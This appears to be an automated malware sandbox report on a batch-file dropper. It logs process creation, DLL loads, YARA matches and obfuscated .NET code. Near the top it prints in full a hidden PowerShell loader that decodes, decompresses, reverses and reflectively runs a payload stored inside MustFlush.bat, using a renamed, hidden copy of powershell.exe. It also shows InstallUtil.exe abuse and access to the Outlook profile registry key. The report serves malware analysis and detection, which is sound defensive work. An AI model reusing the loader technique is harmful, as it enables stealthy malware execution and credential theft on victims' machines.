Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" Jump to behavior
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: atl.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: msisip.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: wshext.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: ilZhNx3JAc.bat Static file information: File size 1411997 > 1048576
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr

Data Obfuscation

Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.cs .Net Code: Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777252)),Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777284))})
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, FieldBridgeMapper.cs .Net Code: PostRegistry System.Reflection.Assembly.Load(byte[])
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8ac0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.6038a80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.60f8fa0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6006d78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.5f46858.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.5e02330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1406003010.0000000008AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419AAE3 pushad ; retf 7_2_0419AAE7
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_04198BF8 push eax; retf 0007h 7_2_04198C02
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_0419702D push 0007CA45h; retf 0007h 7_2_04197042
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_04199C30 push es; ret 7_2_04199C40
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08A8679E push esi; iretd 7_2_08A8679F
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B7C4F8 push eax; iretd 7_2_08B7C4F9
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08B704E5 push edi; ret 7_2_08B704E6
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Code function: 7_2_08C736DC push es; retf 7_2_08C736E2
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_00C3AAE3 pushad ; retf 16_2_00C3AAE7
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_088104E5 push edi; ret 16_2_088104E6
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_0881C4F8 push eax; iretd 16_2_0881C4F9
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Code function: 16_2_089136DC push es; retf 16_2_089136E2
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, rKl4Lg7OEo5Kh9p6gI8.cs High entropy of concatenated method names: 'C2D7ydMgUu', 'QgJ7ieDv13', 'UgO7DmYuT1', 'nfa7YTWaOF', 'IHt7vbO1Aq', 'dUOqoLYkCbhRuB13SSH', 'm48PHnY56OShfCoU7Mo', 'siDPihYgVHwMfdDCjcH', 'unH5vXYbdwMZ85ZMRr0', 'aDoFlOYNrSm1sIwMr8W'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'X1IvcqcAaFxMnXfMfvL'
